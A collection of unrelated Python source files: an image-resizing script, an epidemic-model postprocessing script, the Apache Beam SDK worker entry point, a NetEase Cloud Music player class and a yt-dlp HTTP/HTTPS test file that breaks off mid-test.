epic_battle_royale(args.dir, args.max_proc)
|
resize_images.py
|
import argparse
import cv2
import os
import numpy as np
import multiprocessing
parser = argparse.ArgumentParser()
parser.add_argument('--w', help='Target image width')
parser.add_argument('--h', help='Target image height')
parser.add_argument('--source', help='Directory containing images')
parser.add_argument('--target', help='Directory to write resized images to')
args = parser.parse_args()
w = int(args.w)
h = int(args.h)
source = args.source
target = args.target
paths = os.listdir(source)
paths_split = np.array_split(paths, multiprocessing.cpu_count())
def process(items):
for item in items:
img = cv2.imread(os.path.join(source, item))
img = cv2.resize(img, dsize=(w, h))
cv2.imwrite(os.path.join(target, item), img)
jobs = []
for process_paths in paths_split:
p = multiprocessing.Process(target=process, args=(process_paths,))
jobs.append(p)
p.start()
|
postprocess.py
|
"""Postprocesses data across dates and simulation runs before aggregating at geographic levels (ADM0, ADM1, or ADM2)."""
import argparse
import gc
import glob
import importlib
import logging
import os
import queue
import sys
import threading
import warnings
from pathlib import Path
import numpy as np
import pandas as pd
import pyarrow as pa
import pyarrow.compute as pac
import pyarrow.dataset as ds
import pyarrow.types as pat
import tqdm
from .numerical_libs import enable_cupy, reimport_numerical_libs, xp
from .util.read_config import bucky_cfg
from .viz.geoid import read_lookup
# suppress pandas warning caused by pyarrow and the cupy async mempool
warnings.simplefilter(action="ignore", category=FutureWarning)
cupy_found = importlib.util.find_spec("cupy") is not None
# Initialize argument parser
parser = argparse.ArgumentParser(description="Bucky Model postprocessing")
# Required: File to process
parser.add_argument(
"file",
default=max(
glob.glob(bucky_cfg["raw_output_dir"] + "/*/"),
key=os.path.getctime,
default="Most recently created folder in raw_output_dir",
),
nargs="?",
type=str,
help="File to proess",
)
# Graph file used for this run. Defaults to most recently created
parser.add_argument(
"-g",
"--graph_file",
default=None,
type=str,
help="Graph file used for simulation",
)
# Aggregation levels, e.g. state, county, etc.
parser.add_argument(
"-l",
"--levels",
default=["adm0", "adm1", "adm2"],
nargs="+",
type=str,
help="Levels on which to aggregate",
)
# Quantiles
default_quantiles = [
0.01,
0.025,
0.050,
0.100,
0.150,
0.200,
0.250,
0.300,
0.350,
0.400,
0.450,
0.500,
0.550,
0.600,
0.650,
0.7,
0.750,
0.800,
0.85,
0.9,
0.950,
0.975,
0.990,
]
parser.add_argument(
"-q",
"--quantiles",
default=default_quantiles,
nargs="+",
type=float,
help="Quantiles to process",
)
# Top-level output directory
parser.add_argument(
"-o",
"--output",
default=bucky_cfg["output_dir"],
type=str,
help="Directory for output files",
)
# Prefix for filenames
parser.add_argument(
"--prefix",
default=None,
type=str,
help="Prefix for output folder (default is UUID)",
)
# Specify optional end date
parser.add_argument("--end_date", default=None, type=str)
# Can pass in a lookup table to use in place of graph
parser.add_argument(
"--lookup",
default=None,
type=str,
help="Lookup table defining geoid relationships",
)
parser.add_argument("-gpu", "--gpu", action="store_true", default=cupy_found, help="Use cupy instead of numpy")
parser.add_argument("--verify", action="store_true", help="Verify the quality of the data")
# Optional flags
parser.add_argument("-v", "--verbose", action="store_true", help="Print extra information")
# TODO move this to util
def pinned_array(array):
"""Allocate a cudy pinned array that shares mem with an input numpy array."""
# first constructing pinned memory
mem = xp.cuda.alloc_pinned_memory(array.nbytes)
src = np.frombuffer(mem, array.dtype, array.size).reshape(array.shape)
src[...] = array
return src
def main(args=None):
"""Main method for postprocessing the raw outputs from an MC run."""
if args is None:
args = sys.argv[1:]
args = parser.parse_args(args)
# Start parsing args
quantiles = args.quantiles
verbose = args.verbose
prefix = args.prefix
use_gpu = args.gpu
if verbose:
logging.info(args)
# File Management
top_output_dir = args.output
# Check if it exists, make if not
if not os.path.exists(top_output_dir):
os.makedirs(top_output_dir)
# Use lookup, add prefix
# TODO need to handle lookup weights
if args.lookup is not None:
lookup_df = read_lookup(args.lookup)
if prefix is None:
prefix = Path(args.lookup).stem
# TODO if args.lookup we need to check it for weights
# Create subfolder for this run using UUID of run
uuid = args.file.split("/")[-2]
if prefix is not None:
uuid = prefix + "_" + uuid
# Create directory if it doesn't exist
output_dir = os.path.join(top_output_dir, uuid)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
data_dir = os.path.join(args.file, "data/")
metadata_dir = os.path.join(args.file, "metadata/")
adm_mapping = pd.read_csv(os.path.join(metadata_dir, "adm_mapping.csv"))
dates = pd.read_csv(os.path.join(metadata_dir, "dates.csv"))
dates = dates["date"].to_numpy()
n_adm2 = len(adm_mapping)
adm2_sorted_ind = xp.argsort(xp.array(adm_mapping["adm2"].to_numpy()))
if use_gpu:
enable_cupy(optimize=True)
reimport_numerical_libs("postprocess")
per_capita_cols = [
"cumulative_reported_cases",
"cumulative_deaths",
"current_hospitalizations",
"daily_reported_cases",
"daily_deaths",
"vacc_dose1",
"vacc_dose2",
"immune",
]
pop_weighted_cols = [
"case_reporting_rate",
"R_eff",
"frac_vacc_dose1",
"frac_vacc_dose2",
"frac_vacc_dose1_65",
"frac_vacc_dose2_65",
"frac_immune",
"frac_immune_65",
"state_phase",
]
adm_mapping["adm0"] = 1
adm_map = adm_mapping.to_dict(orient="list")
adm_map = {k: xp.array(v)[adm2_sorted_ind] for k, v in adm_map.items()}
adm_array_map = {k: xp.unique(v, return_inverse=True)[1] for k, v in adm_map.items()}
adm_sizes = {k: xp.to_cpu(xp.max(v) + 1).item() for k, v in adm_array_map.items()}
adm_level_values = {k: xp.to_cpu(xp.unique(v)) for k, v in adm_map.items()}
adm_level_values["adm0"] = np.array(["US"])
if args.lookup is not None and "weight" in lookup_df.columns:
weight_series = lookup_df.set_index("adm2")["weight"].reindex(adm_mapping["adm2"], fill_value=0.0)
weights = np.array(weight_series.to_numpy(), dtype=np.float32)
# TODO we should ignore all the adm2 not in weights rather than just zeroing them (it'll go a lot faster)
else:
weights = np.ones_like(adm2_sorted_ind, dtype=np.float32)
write_queue = queue.Queue()
def _writer():
"""Write thread that will pull from a queue."""
# Call to_write.get() until it returns None
file_tables = {}
for fname, q_dict in iter(write_queue.get, None):
df = pd.DataFrame(q_dict)
id_col = df.columns[df.columns.str.contains("adm.")].values[0]
df = df.set_index([id_col, "date", "quantile"])
df = df.reindex(sorted(df.columns), axis=1)
if fname in file_tables:
tmp = pa.table(q_dict)
file_tables[fname] = pa.concat_tables([file_tables[fname], tmp])
else:
file_tables[fname] = pa.table(q_dict)
write_queue.task_done()
# dump tables to disk
for fname in tqdm.tqdm(file_tables):
df = file_tables[fname].to_pandas()
id_col = df.columns[df.columns.str.contains("adm.")].values[0]
df = df.set_index([id_col, "date", "quantile"])
df = df.reindex(sorted(df.columns), axis=1)
df.to_csv(fname, header=True, mode="w")
write_queue.task_done()
write_thread = threading.Thread(target=_writer)
write_thread.start()
# TODO this depends on out of scope vars, need to clean that up
def pa_array_quantiles(array, level):
"""Calculate the quantiles of a pyarrow array after shipping it to the GPU."""
data = array.to_numpy().reshape(-1, n_adm2)
data = data[:, adm2_sorted_ind]
data_gpu = xp.array(data.T)
if adm_sizes[level] == 1:
# TODO need switching here b/c cupy handles xp.percentile weirdly with a size 1 dim :(
if use_gpu:
level_data_gpu = xp.sum(data_gpu, axis=0) # need this if cupy
else:
level_data_gpu = xp.sum(data_gpu, axis=0, keepdims=True).T # for numpy
q_data_gpu = xp.empty((len(percentiles), adm_sizes[level]), dtype=level_data_gpu.dtype)
# It appears there's a cupy bug when the 1st axis of the array passed to percentiles has size 1
xp.percentile(level_data_gpu, q=percentiles, axis=0, out=q_data_gpu)
else:
level_data_gpu = xp.zeros((adm_sizes[level], data_gpu.shape[1]), dtype=data_gpu.dtype)
xp.scatter_add(level_data_gpu, adm_array_map[level], data_gpu)
q_data_gpu = xp.empty((len(percentiles), adm_sizes[level]), dtype=level_data_gpu.dtype)
xp.percentile(level_data_gpu, q=percentiles, axis=1, out=q_data_gpu)
return q_data_gpu
try:
percentiles = xp.array(quantiles, dtype=np.float64) * 100.0
quantiles = np.array(quantiles)
for date_i, date in enumerate(tqdm.tqdm(dates)):
dataset = ds.dataset(data_dir, format="parquet", partitioning=["date"])
table = dataset.to_table(filter=ds.field("date") == "date=" + str(date_i))
table = table.drop(("date", "rid", "adm2_id")) # we don't need these b/c metadata
pop_weight_table = table.select(pop_weighted_cols)
table = table.drop(pop_weighted_cols)
w = np.ravel(np.broadcast_to(weights, (table.shape[0] // weights.shape[0], weights.shape[0])))
for i, col in enumerate(table.column_names):
if pat.is_float64(table.column(i).type):
typed_w = w.astype(np.float64)
else:
typed_w = w.astype(np.float32)
tmp = pac.multiply_checked(table.column(i), typed_w)
table = table.set_column(i, col, tmp)
for col in pop_weighted_cols:
if pat.is_float64(pop_weight_table[col].type):
typed_w = table["total_population"].to_numpy().astype(np.float64)
else:
typed_w = table["total_population"].to_numpy().astype(np.float32)
tmp = pac.multiply_checked(pop_weight_table[col], typed_w)
table = table.append_column(col, tmp)
for level in args.levels:
all_q_data = {}
for col in table.column_names: # TODO can we do all at once since we dropped date?
all_q_data[col] = pa_array_quantiles(table[col], level)
# all_q_data = {col: pa_array_quantiles(table[col]) for col in table.column_names}
# we could do this outside the date loop and cache for each adm level...
out_shape = (len(percentiles),) + adm_level_values[level].shape
all_q_data[level] = np.broadcast_to(adm_level_values[level], out_shape)
all_q_data["date"] = np.broadcast_to(date, out_shape)
all_q_data["quantile"] = np.broadcast_to(quantiles[..., None], out_shape)
for col in per_capita_cols:
all_q_data[col + "_per_100k"] = 100000.0 * all_q_data[col] / all_q_data["total_population"]
for col in pop_weighted_cols:
all_q_data[col] = all_q_data[col] / all_q_data["total_population"]
for col in all_q_data:
all_q_data[col] = xp.to_cpu(all_q_data[col].T.ravel())
write_queue.put((os.path.join(output_dir, level + "_quantiles.csv"), all_q_data))
del dataset
gc.collect()
except (KeyboardInterrupt, SystemExit):
logging.warning("Caught SIGINT, cleaning up")
write_queue.put(None) # send signal to term loop
write_thread.join() # join the write_thread
finally:
write_queue.put(None) # send signal to term loop
write_thread.join() # join the write_thread
if __name__ == "__main__":
# from line_profiler import LineProfiler
# lp = LineProfiler()
# lp_wrapper = lp(main)
# lp.add_function(main._process_date)
# lp_wrapper()
# lp.print_stats()
main()
|
sdk_worker_main.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK Fn Harness entry point."""
from __future__ import absolute_import
import http.server
import json
import logging
import os
import re
import sys
import threading
import traceback
from builtins import object
from google.protobuf import text_format
from apache_beam.internal import pickler
from apache_beam.options import pipeline_options
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.internal import names
from apache_beam.runners.worker.log_handler import FnApiLogRecordHandler
from apache_beam.runners.worker.sdk_worker import SdkHarness
from apache_beam.utils import profiler
# This module is experimental. No backwards-compatibility guarantees.
class StatusServer(object):
@classmethod
def get_thread_dump(cls):
lines = []
frames = sys._current_frames() # pylint: disable=protected-access
for t in threading.enumerate():
lines.append('--- Thread #%s name: %s ---\n' % (t.ident, t.name))
lines.append(''.join(traceback.format_stack(frames[t.ident])))
return lines
def start(self, status_http_port=0):
"""Executes the serving loop for the status server.
Args:
status_http_port(int): Binding port for the debug server.
Default is 0 which means any free unsecured port
"""
class StatusHttpHandler(http.server.BaseHTTPRequestHandler):
"""HTTP handler for serving stacktraces of all threads."""
def do_GET(self): # pylint: disable=invalid-name
"""Return all thread stacktraces information for GET request."""
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
for line in StatusServer.get_thread_dump():
self.wfile.write(line.encode('utf-8'))
def log_message(self, f, *args):
"""Do not log any messages."""
pass
self.httpd = httpd = http.server.HTTPServer(
('localhost', status_http_port), StatusHttpHandler)
logging.info('Status HTTP server running at %s:%s', httpd.server_name,
httpd.server_port)
httpd.serve_forever()
def main(unused_argv):
"""Main entry point for SDK Fn Harness."""
if 'LOGGING_API_SERVICE_DESCRIPTOR' in os.environ:
logging_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['LOGGING_API_SERVICE_DESCRIPTOR'],
logging_service_descriptor)
# Send all logs to the runner.
fn_log_handler = FnApiLogRecordHandler(logging_service_descriptor)
# TODO(BEAM-5468): This should be picked up from pipeline options.
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(fn_log_handler)
logging.info('Logging handler created.')
else:
fn_log_handler = None
# Start status HTTP server thread.
thread = threading.Thread(name='status_http_server',
target=StatusServer().start)
thread.daemon = True
thread.setName('status-server-daemon')
thread.start()
if 'PIPELINE_OPTIONS' in os.environ:
sdk_pipeline_options = _parse_pipeline_options(
os.environ['PIPELINE_OPTIONS'])
else:
sdk_pipeline_options = PipelineOptions.from_dictionary({})
if 'SEMI_PERSISTENT_DIRECTORY' in os.environ:
semi_persistent_directory = os.environ['SEMI_PERSISTENT_DIRECTORY']
else:
semi_persistent_directory = None
logging.info('semi_persistent_directory: %s', semi_persistent_directory)
_worker_id = os.environ.get('WORKER_ID', None)
try:
_load_main_session(semi_persistent_directory)
except Exception: # pylint: disable=broad-except
exception_details = traceback.format_exc()
logging.error(
'Could not load main session: %s', exception_details, exc_info=True)
try:
logging.info('Python sdk harness started with pipeline_options: %s',
sdk_pipeline_options.get_all_options(drop_default=True))
service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['CONTROL_API_SERVICE_DESCRIPTOR'],
service_descriptor)
# TODO(robertwb): Support credentials.
assert not service_descriptor.oauth2_client_credentials_grant.url
SdkHarness(
control_address=service_descriptor.url,
worker_count=_get_worker_count(sdk_pipeline_options),
worker_id=_worker_id,
profiler_factory=profiler.Profile.factory_from_options(
sdk_pipeline_options.view_as(pipeline_options.ProfilingOptions))
).run()
logging.info('Python sdk harness exiting.')
except: # pylint: disable=broad-except
logging.exception('Python sdk harness failed: ')
raise
finally:
if fn_log_handler:
fn_log_handler.close()
def _parse_pipeline_options(options_json):
options = json.loads(options_json)
# Check the options field first for backward compatibility.
if 'options' in options:
return PipelineOptions.from_dictionary(options.get('options'))
else:
# Remove extra urn part from the key.
portable_option_regex = r'^beam:option:(?P<key>.*):v1$'
return PipelineOptions.from_dictionary({
re.match(portable_option_regex, k).group('key')
if re.match(portable_option_regex, k) else k: v
for k, v in options.items()
})
def _get_worker_count(pipeline_options):
"""Extract worker count from the pipeline_options.
This defines how many SdkWorkers will be started in this Python process.
Each SdkWorker will have its own thread to process data. The name of the
experimental parameter is 'worker_threads'.
Example Usage in the Command Line:
--experimental worker_threads=1
Note: worker_threads is an experimental flag and might not be available in
future releases.
Returns:
an int containing the worker_threads to use. Default is 12
"""
experiments = pipeline_options.view_as(DebugOptions).experiments
experiments = experiments if experiments else []
for experiment in experiments:
# There should only be 1 match so returning from the loop
if re.match(r'worker_threads=', experiment):
return int(
re.match(r'worker_threads=(?P<worker_threads>.*)',
experiment).group('worker_threads'))
return 12
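# Hedged illustration of the parsing above (the experiment value '4' is arbitrary, not a Beam default):
#   opts = PipelineOptions(['--experiments', 'worker_threads=4'])
#   _get_worker_count(opts)  # -> 4; without the experiment the function falls back to 12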
def _load_main_session(semi_persistent_directory):
"""Loads a pickled main session from the path specified."""
if semi_persistent_directory:
session_file = os.path.join(semi_persistent_directory, 'staged',
names.PICKLED_MAIN_SESSION_FILE)
if os.path.isfile(session_file):
pickler.load_session(session_file)
else:
logging.warning(
'No session file found: %s. Functions defined in __main__ '
'(interactive session) may fail.', session_file)
else:
logging.warning(
'No semi_persistent_directory found: Functions defined in __main__ '
'(interactive session) may fail.')
if __name__ == '__main__':
main(sys.argv)
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: omi
# @Last Modified time: 2015-01-30 18:05:08
'''
NetEase Cloud Music Player
'''
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from builtins import str
from future import standard_library
standard_library.install_aliases()
# Let's make some noise
import subprocess
import threading
import time
import os
import random
import re
from .ui import Ui
from .storage import Storage
from .api import NetEase
from .cache import Cache
from .config import Config
from . import logger
log = logger.getLogger(__name__)
class Player(object):
def __init__(self):
self.config = Config()
self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.pause_flag = False
self.process_length = 0
self.process_location = 0
self.process_first = False
self.storage = Storage()
self.info = self.storage.database['player_info']
self.songs = self.storage.database['songs']
self.playing_id = -1
self.playing_name = ''
self.cache = Cache()
self.notifier = self.config.get_item('notifier')
self.mpg123_parameters = self.config.get_item('mpg123_parameters')
self.end_callback = None
self.playing_song_changed_callback = None
def popen_recall(self, onExit, popenArgs):
'''
Runs the given args in subprocess.Popen, and then calls the function
onExit when the subprocess completes.
onExit is a callable object, and popenArgs is a list/tuple of args
that will be given to subprocess.Popen.
'''
def runInThread(onExit, arg):
para = ['mpg123', '-R']
para[1:1] = self.mpg123_parameters
self.popen_handler = subprocess.Popen(para,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.popen_handler.stdin.write(b'V ' + str(self.info['playing_volume']).encode('utf-8') + b'\n')
if arg:
self.popen_handler.stdin.write(b'L ' + arg.encode('utf-8') + b'\n')
else:
self.next_idx()
onExit()
return
self.popen_handler.stdin.flush()
self.process_first = True
while True:
if self.playing_flag is False:
break
strout = self.popen_handler.stdout.readline().decode('utf-8')
if re.match(r'^@F.*$', strout):
process_data = strout.split(' ')
process_location = float(process_data[4])
if self.process_first:
self.process_length = process_location
self.process_first = False
self.process_location = 0
else:
self.process_location = self.process_length - process_location # NOQA
continue
elif strout[:2] == '@E':
# get an alternative url from the new api
sid = popenArgs['song_id']
new_url = NetEase().songs_detail_new_api([sid])[0]['url']
if new_url is None:
log.warning(('Song {} is unavailable '
'due to copyright issue.').format(sid))
break
log.warning(
'Song {} is not compatible with old api.'.format(sid))
popenArgs['mp3_url'] = new_url
self.popen_handler.stdin.write(b'\nL ' + new_url.encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
self.popen_handler.stdout.readline()
elif strout == '@P 0\n':
self.popen_handler.stdin.write(b'Q\n')
self.popen_handler.stdin.flush()
self.popen_handler.kill()
break
if self.playing_flag:
self.next_idx()
onExit()
return
def getLyric():
if 'lyric' not in self.songs[str(self.playing_id)].keys():
self.songs[str(self.playing_id)]['lyric'] = []
if len(self.songs[str(self.playing_id)]['lyric']) > 0:
return
netease = NetEase()
lyric = netease.song_lyric(self.playing_id)
if lyric == [] or lyric == '未找到歌词':
return
lyric = lyric.split('\n')
self.songs[str(self.playing_id)]['lyric'] = lyric
return
def gettLyric():
if 'tlyric' not in self.songs[str(self.playing_id)].keys():
self.songs[str(self.playing_id)]['tlyric'] = []
if len(self.songs[str(self.playing_id)]['tlyric']) > 0:
return
netease = NetEase()
tlyric = netease.song_tlyric(self.playing_id)
if tlyric == [] or tlyric == '未找到歌词翻译':
return
tlyric = tlyric.split('\n')
self.songs[str(self.playing_id)]['tlyric'] = tlyric
return
def cacheSong(song_id, song_name, artist, song_url):
def cacheExit(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.add(song_id, song_name, artist, song_url, cacheExit)
self.cache.start_download()
if 'cache' in popenArgs.keys() and os.path.isfile(popenArgs['cache']):
thread = threading.Thread(target=runInThread,
args=(onExit, popenArgs['cache']))
else:
thread = threading.Thread(target=runInThread,
args=(onExit, popenArgs['mp3_url']))
cache_thread = threading.Thread(
target=cacheSong,
args=(popenArgs['song_id'], popenArgs['song_name'], popenArgs[
'artist'], popenArgs['mp3_url']))
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=getLyric, args=())
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(target=gettLyric, args=())
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def get_playing_id(self):
return self.playing_id
def get_playing_name(self):
return self.playing_name
def recall(self):
if self.info['idx'] >= len(self.info[
'player_list']) and self.end_callback is not None:
log.debug('Callback')
self.end_callback()
if self.info['idx'] < 0 or self.info['idx'] >= len(self.info[
'player_list']):
self.info['idx'] = 0
self.stop()
return
self.playing_flag = True
self.pause_flag = False
item = self.songs[self.info['player_list'][self.info['idx']]]
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time())
if self.notifier:
self.ui.notify('Now playing', item['song_name'],
item['album_name'], item['artist'])
self.playing_id = item['song_id']
self.playing_name = item['song_name']
self.popen_recall(self.recall, item)
def generate_shuffle_playing_list(self):
del self.info['playing_list'][:]
for i in range(0, len(self.info['player_list'])):
self.info['playing_list'].append(i)
random.shuffle(self.info['playing_list'])
self.info['ridx'] = 0
def new_player_list(self, type, title, datalist, offset):
self.info['player_list_type'] = type
self.info['player_list_title'] = title
self.info['idx'] = offset
del self.info['player_list'][:]
del self.info['playing_list'][:]
self.info['ridx'] = 0
for song in datalist:
self.info['player_list'].append(str(song['song_id']))
if str(song['song_id']) not in self.songs.keys():
self.songs[str(song['song_id'])] = song
else:
database_song = self.songs[str(song['song_id'])]
if (database_song['song_name'] != song['song_name'] or
database_song['quality'] != song['quality']):
self.songs[str(song['song_id'])] = song
def append_songs(self, datalist):
for song in datalist:
self.info['player_list'].append(str(song['song_id']))
if str(song['song_id']) not in self.songs.keys():
self.songs[str(song['song_id'])] = song
else:
database_song = self.songs[str(song['song_id'])]
cond = any([database_song[k] != song[k]
for k in ('song_name', 'quality', 'mp3_url')])
if cond:
if 'cache' in self.songs[str(song['song_id'])].keys():
song['cache'] = self.songs[str(song['song_id'])][
'cache']
self.songs[str(song['song_id'])] = song
if len(datalist) > 0 and self.info['playing_mode'] == 3 or self.info[
'playing_mode'] == 4:
self.generate_shuffle_playing_list()
def play_and_pause(self, idx):
# if same playlists && idx --> same song :: pause/resume it
if self.info['idx'] == idx:
if self.pause_flag:
self.resume()
else:
self.pause()
else:
self.info['idx'] = idx
# if it's playing
if self.playing_flag:
self.switch()
# start new play
else:
self.recall()
# play another
def switch(self):
self.stop()
# wait process be killed
time.sleep(0.1)
self.recall()
def stop(self):
if self.playing_flag and self.popen_handler:
self.playing_flag = False
self.popen_handler.stdin.write(b'Q\n')
self.popen_handler.stdin.flush()
try:
self.popen_handler.kill()
except OSError as e:
log.error(e)
return
def pause(self):
if not self.playing_flag and not self.popen_handler:
return
self.pause_flag = True
self.popen_handler.stdin.write(b'P\n')
self.popen_handler.stdin.flush()
item = self.songs[self.info['player_list'][self.info['idx']]]
self.ui.build_playinfo(item['song_name'],
item['artist'],
item['album_name'],
item['quality'],
time.time(),
pause=True)
def resume(self):
self.pause_flag = False
self.popen_handler.stdin.write(b'P\n')
self.popen_handler.stdin.flush()
item = self.songs[self.info['player_list'][self.info['idx']]]
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time())
self.playing_id = item['song_id']
self.playing_name = item['song_name']
def _swap_song(self):
plist = self.info['playing_list']
now_songs = plist.index(self.info['idx'])
plist[0], plist[now_songs] = plist[now_songs], plist[0]
def _is_idx_valid(self):
return 0 <= self.info['idx'] < len(self.info['player_list'])
def _inc_idx(self):
if self.info['idx'] < len(self.info['player_list']):
self.info['idx'] += 1
def _dec_idx(self):
if self.info['idx'] > 0:
self.info['idx'] -= 1
def _need_to_shuffle(self):
playing_list = self.info['playing_list']
ridx = self.info['ridx']
idx = self.info['idx']
if ridx >= len(playing_list) or playing_list[ridx] != idx:
return True
else:
return False
def next_idx(self):
if not self._is_idx_valid():
self.stop()
return
playlist_len = len(self.info['player_list'])
playinglist_len = len(self.info['playing_list'])
# Playing mode. 0 is ordered. 1 is ordered loop.
# 2 is single song loop. 3 is single random. 4 is random loop.
if self.info['playing_mode'] == 0:
self._inc_idx()
elif self.info['playing_mode'] == 1:
self.info['idx'] = (self.info['idx'] + 1) % playlist_len
elif self.info['playing_mode'] == 2:
self.info['idx'] = self.info['idx']
elif self.info['playing_mode'] == 3 or self.info['playing_mode'] == 4:
if self._need_to_shuffle():
self.generate_shuffle_playing_list()
playinglist_len = len(self.info['playing_list'])
# When the playing list is regenerated, keep the current song unchanged.
self._swap_song()
self.info['ridx'] += 1
# Out of bounds
if self.info['playing_mode'] == 4:
self.info['ridx'] %= playinglist_len
if self.info['ridx'] >= playinglist_len:
self.info['idx'] = playlist_len
else:
self.info['idx'] = self.info['playing_list'][self.info['ridx']]
else:
self.info['idx'] += 1
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
time.sleep(0.01)
self.next_idx()
self.recall()
def prev_idx(self):
if not self._is_idx_valid():
self.stop()
return
playlist_len = len(self.info['player_list'])
playinglist_len = len(self.info['playing_list'])
# Playing mode. 0 is ordered. 1 is ordered loop.
# 2 is single song loop. 3 is single random. 4 is random loop
if self.info['playing_mode'] == 0:
self._dec_idx()
elif self.info['playing_mode'] == 1:
self.info['idx'] = (self.info['idx'] - 1) % playlist_len
elif self.info['playing_mode'] == 2:
self.info['idx'] = self.info['idx']
elif self.info['playing_mode'] == 3 or self.info['playing_mode'] == 4:
if self._need_to_shuffle():
self.generate_shuffle_playing_list()
playinglist_len = len(self.info['playing_list'])
self.info['ridx'] -= 1
if self.info['ridx'] < 0:
if self.info['playing_mode'] == 3:
self.info['ridx'] = 0
else:
self.info['ridx'] %= playinglist_len
self.info['idx'] = self.info['playing_list'][self.info['ridx']]
else:
self.info['idx'] -= 1
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
time.sleep(0.01)
self.prev_idx()
self.recall()
def shuffle(self):
self.stop()
time.sleep(0.01)
self.info['playing_mode'] = 3
self.generate_shuffle_playing_list()
self.info['idx'] = self.info['playing_list'][self.info['ridx']]
self.recall()
def volume_up(self):
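# Volume changes in steps of 7, clamped to 0-100; 'V <n>' sets the absolute volume on the player subprocess.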
self.info['playing_volume'] = self.info['playing_volume'] + 7
if (self.info['playing_volume'] > 100):
self.info['playing_volume'] = 100
if not self.playing_flag:
return
self.popen_handler.stdin.write(b'V ' + str(self.info[
'playing_volume']).encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
def volume_down(self):
self.info['playing_volume'] = self.info['playing_volume'] - 7
if (self.info['playing_volume'] < 0):
self.info['playing_volume'] = 0
if not self.playing_flag:
return
self.popen_handler.stdin.write(b'V ' + str(self.info[
'playing_volume']).encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
def update_size(self):
self.ui.update_size()
if not 0 <= self.info['idx'] < len(self.info['player_list']):
if self.info['player_list']:
log.error('Index not in range!')
log.debug(self.info)
else:
item = self.songs[self.info['player_list'][self.info['idx']]]
if self.playing_flag:
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time())
if self.pause_flag:
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time(),
pause=True)
def cacheSong1time(self, song_id, song_name, artist, song_url):
def cacheExit(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, cacheExit)
self.cache.start_download()
|
test_http.py
|
#!/usr/bin/env python3
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import ssl
import threading
from test.helper import http_server_port
from yt_dlp import YoutubeDL
from yt_dlp.compat import compat_http_server, compat_urllib_request
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
class HTTPTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
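# Serve a tiny HTML page embedding /vid.mp4, the fake MP4 payload itself, and the same
# page under a percent-encoded non-ASCII path.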
def do_GET(self):
if self.path == '/video.html':
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(b'<html><video src="/vid.mp4" /></html>')
elif self.path == '/vid.mp4':
self.send_response(200)
self.send_header('Content-Type', 'video/mp4')
self.end_headers()
self.wfile.write(b'\x00\x00\x00\x00\x20\x66\x74[video]')
elif self.path == '/%E4%B8%AD%E6%96%87.html':
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(b'<html><video src="/vid.mp4" /></html>')
else:
assert False
class FakeLogger:
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
pass
class TestHTTP(unittest.TestCase):
def setUp(self):
self.httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), HTTPTestRequestHandler)
self.port = http_server_port(self.httpd)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
class TestHTTPS(unittest.TestCase):
def setUp(self):
certfn = os.path.join(TEST_DIR, 'testcert.pem')
self.httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), HTTPTestRequestHandler)
self.httpd.socket = ssl.wrap_socket(
self.httpd.socket, certfile=certfn, server_side=True)
self.port = http_server_port(self.httpd)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def test_nocheckcertificate(self):
ydl = YoutubeDL({'logger': FakeLogger()})
self.assertRaises(
Exception,
ydl.extract_info, 'https://127.0.0.1:%d/video.html' % self.port)
ydl = YoutubeDL({'logger': FakeLogger(), 'nocheckcertificate': True})
r = ydl.extract_info('https://127.0.0.1:%d/video.html' % self.port)
